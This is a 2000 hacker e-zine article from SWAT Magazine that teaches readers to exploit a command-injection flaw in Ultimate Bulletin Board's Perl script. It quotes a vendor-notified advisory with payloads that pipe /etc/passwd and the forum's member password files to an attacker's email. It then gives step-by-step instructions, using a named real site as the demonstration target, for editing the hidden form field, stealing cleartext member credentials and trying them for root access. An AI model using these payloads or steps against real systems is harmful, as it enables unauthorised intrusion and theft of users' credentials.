_________ SWAT MAGAZINE ISSUE THIRTY TWO AUGUST 2000  __________
  /         \___________________________________________/          \
 /                             hacking UBB                          \
/                               SNaFu "MGD"                          \
-----------------------------------------------------------------------
                              www.themgd.co.uk



I've read SWAT for along time but i've never written for them before so
sorry if this isn't upto the usual high standard that the average SWAT
article is but its my first attempt so gimme a break,I'm gonna write
some more articles if i get round to it (infact i'm pretty damn sure i
will get round to it cos i've been grounded for the next 6 month's). ok
'nuff of the shit lets get down to the 'sloit 

any self respecting hacker has heard of the wwwboard exploit well this
one takes it alot further and hopefully with a bit of luck will get
you r00t. The target is Ultimate Bullitain Board this is just like
wwwboard but alot more sophisticated,it is a perl script that alot of
respected sites use (including progenic).

this is the file i got that told me about the exploit

-----------------------------------------------------------------------

"Hello.

Writing cgi scripts in perl is simple. It's also rather safe,
providing authors follow very simple instructions. But they don't.

Browsing some site, I found that their forums were based not on home-
made scripts, but rather commercial software product. Hey, said I to
myself, remember those story about pcweek hack ? They use commercial
package photoads. Let's look what that Ultimate Bulletin Board by
Infopop is.

I grabbed freeware version from http://www.ultimatebb.com and
after 10-minutes grepping found those lines:

ubb_library.pl:901-902
          if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
          open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");

(notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while
writing it ? Girls ?)

And the $ThreadFile takes its value directly from the hidden (hmm!)
field `topic'.

So when I filled the form with
topic='012345.ubb|mail hacker@evil.com </etc/passwd|'
It happily gives me /etc/passwd. And
topic='012345.ubb|cat Members/*|mail hacker@evil.org|'
shows all users of bulletin board, and their passwords too (in cleartext!).

So one should only open "reply" form in the forum, save it to disk,
and set topic field to whatever he want. And this stupid UBB (at least
freeware version) doesn't keep the logs (unless, so-called, hacklog,
used when the condition above is not met).

The fix is obvious. But the rule of the thumb is "do not use magic perl open".
At least in cgi scripts. If you want to open regular file, sysopen does
the trick as well.

And again: CHECK EVERYTHING!

Regards,
SerG.

P.S. Vendor was notified."

--------------------------------------------------------------------
well thanx alot SerG for bringing that to my attention

if you don't understand that then don't worry (I didn't understand
it all at the beginning) I'm gonna explain it to you. Basically it
says that its pretty fucked up and easily exploitable
and you can exploit it if you tell it to send you the password file
IN PLAIN TEXT 

ok Exploiting it

first of all find your target (Hint: altavista advanced search
"url:/ubb/" you should get hundreds of results) but for this
demonstration i will use http://www.Aota.net/cgi-bin/Ultimate.cgi
once you have your target ,you have to register fill in bullshit apart
from your e-mail addy(use a webase one) and make sure you remember your
User/Pass ok done that shit now to the good stuff go into one message
and post a reply using the postareply button near the bottom ,ok now
right click and and press "veiw sorce" in the source code look for 

<INPUT TYPE="HIDDEN" NAME="number" VALUE="3">
<INPUT TYPE="HIDDEN" NAME="topic" VALUE="000369.cgi"> 
(if you try a diffrent site to the demonstration then the
000369.cgi bit will be different)

once you have found this copy "|cat Members/*|mail hacker@evil.org"
and paste it right after 000369.cgi so it looks like this

 <INPUT TYPE="HIDDEN" NAME="topic" VALUE="000369.cgi|cat Members/*|mail evil@hacker.org"> 
(obviously substituting evil@hacker for your e-mail addy) ok save
this and go back to the bit where you got the source code from look
for a link sayin "want to register" on the left hand side
once you have found the link right click it and "copy shortcut" it.
Now go back into the source and find this line  

<FORM ACTION="postings.cgi" NAME="REPLIER" METHOD="POST">

once you have found it paste the shortcut you copyied right infront
of postings.cgi and behind <FORM ACTION= so it should look like this
<FORM ACTION="http://www.aota.net/cgi-bin/Ultimate.cgi?action=agreepostings.cgi" NAME="REPLIER" METHOD="POST">

now edit it down abit to look like this

<FORM ACTION="http://www.aota.net/cgi-bin/postings.cgi" NAME="REPLIER" METHOD="POST">

now save it but instead of saving it as postings[1].txt save it as
postings[1].html ok your pretty much done open the file type in your
User/Pass fill the form in with somin like "I 0wn J00" and click submit
it should say sorry we could not post your reply blah blah blah then
you know you have successfully hacked them now simply go into your mail
box and reep the rewards if you have used the example you will get WE
HAVE LOGGED YOUR ATTEMPT TO HACK THIS FORUM. IF U PERSIST, AUTHORITIES WILL
BE IMMEDIATELY INFORMED blah blah blah. hehe don't worry just don't take the
piss noe go and try it on another site most probarly the admin is dumb and
uses the same pass for his r00t login so give it ago

 
j00 were HaX0r by da SNaFu


big shouts going out to ^HeXon^ ZeRo_degrees ^Insane^ Solidox Nitr8 ^DeMon^
and anyone else i know

check The MGD Site at www.themgd.co.uk(should be up fucking soon if not
try www.themgd.freeserve.co.uk)
or the official irc channel on sandman.ukshells.co.uk #Phuck3d







.....oh yer i nearly forgot TIM your Lame